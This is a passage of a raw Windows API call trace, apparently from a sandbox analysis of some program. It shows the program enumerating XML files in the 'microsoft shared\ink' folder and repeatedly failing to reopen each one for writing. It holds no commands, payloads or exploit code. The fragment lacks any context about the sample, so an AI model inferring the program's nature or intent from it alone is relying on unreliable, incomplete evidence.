lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0099.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.886] AreFileApisANSI () returned 1 [0099.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml", lpUsedDefaultChar=0x0) returned 62 [0099.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.887] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.887] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.887] AreFileApisANSI () returned 1 [0099.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e580 [0099.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml") returned 62 [0099.887] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.887] GetFileType (hFile=0x368) returned 0x1 [0099.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0099.887] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.887] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.888] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.888] CloseHandle (hObject=0x368) returned 1 [0099.888] AreFileApisANSI () returned 1 [0099.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6de98 [0099.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml") returned 62 [0099.888] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.888] GetLastError () returned 0x5 [0099.888] GetLastError () returned 0x5 [0099.888] SetLastError (dwErrCode=0x5) [0099.888] GetLastError () returned 0x5 [0099.888] SetLastError (dwErrCode=0x5) [0099.888] GetLastError () returned 0x5 [0099.888] SetLastError (dwErrCode=0x5) [0099.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.889] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0099.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.890] AreFileApisANSI () returned 1 [0099.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml", lpUsedDefaultChar=0x0) returned 62 [0099.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.890] AreFileApisANSI () returned 1 [0099.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0099.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml") returned 62 [0099.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.890] GetFileType (hFile=0x368) returned 0x1 [0099.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0099.890] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.891] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.891] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.891] CloseHandle (hObject=0x368) returned 1 [0099.891] AreFileApisANSI () returned 1 [0099.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e580 [0099.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml") returned 62 [0099.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.891] GetLastError () returned 0x5 [0099.891] GetLastError () returned 0x5 [0099.891] SetLastError (dwErrCode=0x5) [0099.891] GetLastError () returned 0x5 [0099.891] SetLastError (dwErrCode=0x5) [0099.892] GetLastError () returned 0x5 [0099.892] SetLastError (dwErrCode=0x5) [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.892] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0099.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0099.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0099.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.893] AreFileApisANSI () returned 1 [0099.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml", lpUsedDefaultChar=0x0) returned 62 [0099.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.893] AreFileApisANSI () returned 1 [0099.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0099.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml") returned 62 [0099.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.893] GetFileType (hFile=0x368) returned 0x1 [0099.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0099.894] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.894] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.894] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.894] CloseHandle (hObject=0x368) returned 1 [0099.894] AreFileApisANSI () returned 1 [0099.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e1c8 [0099.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml") returned 62 [0099.894] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.894] GetLastError () returned 0x5 [0099.894] GetLastError () returned 0x5 [0099.894] SetLastError (dwErrCode=0x5) [0099.894] GetLastError () returned 0x5 [0099.895] SetLastError (dwErrCode=0x5) [0099.895] GetLastError () returned 0x5 [0099.895] SetLastError (dwErrCode=0x5) [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.895] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0099.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0099.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.896] AreFileApisANSI () returned 1 [0099.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml", lpUsedDefaultChar=0x0) returned 62 [0099.896] RtlAllocateHeap 